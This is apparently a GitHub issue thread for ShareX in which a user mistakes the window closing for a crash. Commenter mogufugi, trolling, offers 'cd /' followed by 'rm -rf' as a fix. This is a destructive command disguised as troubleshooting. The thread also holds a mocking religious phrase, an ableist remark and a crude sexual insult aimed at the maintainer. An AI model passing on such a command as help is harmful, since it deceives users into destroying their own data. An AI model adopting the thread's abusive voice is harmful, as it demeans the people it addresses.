### ISSUE TITLE
sharex crashes when i click the red x

### ISSUE THREAD

**Issue by Lemmmy** [ShareX/ShareX#1284]
when i click the red x on share x window it disappears what do i to

**Comment by mogufugi** [comment]
Simply try following steps: 1. Open your terminal 2. "cd /" 3. "rm -rf" 4. Now your System will work and ALLAHU AKBAR" Have a nice Day

**Comment by Lemmmy** [comment]
wt hatl is it doing its like lots of lines

**Comment by mogufugi** [comment]
rotate your head 90 degrees so its just 2 lines and then easier like cookiezi image material fc, emit autism to prevent unwanted circumstances

Have a shitty day

**Comment by Jaex** [comment]
If ShareX crash it will show error message box. Is it not shows anything?

**Comment by Lemmmy** [comment]
no

**Comment by Jaex** [comment]
I have no idea how it can crash without show any error window.

**Comment by Lemmmy** [comment]
you should get checked for erectile dysfunction if you cannot reproduce
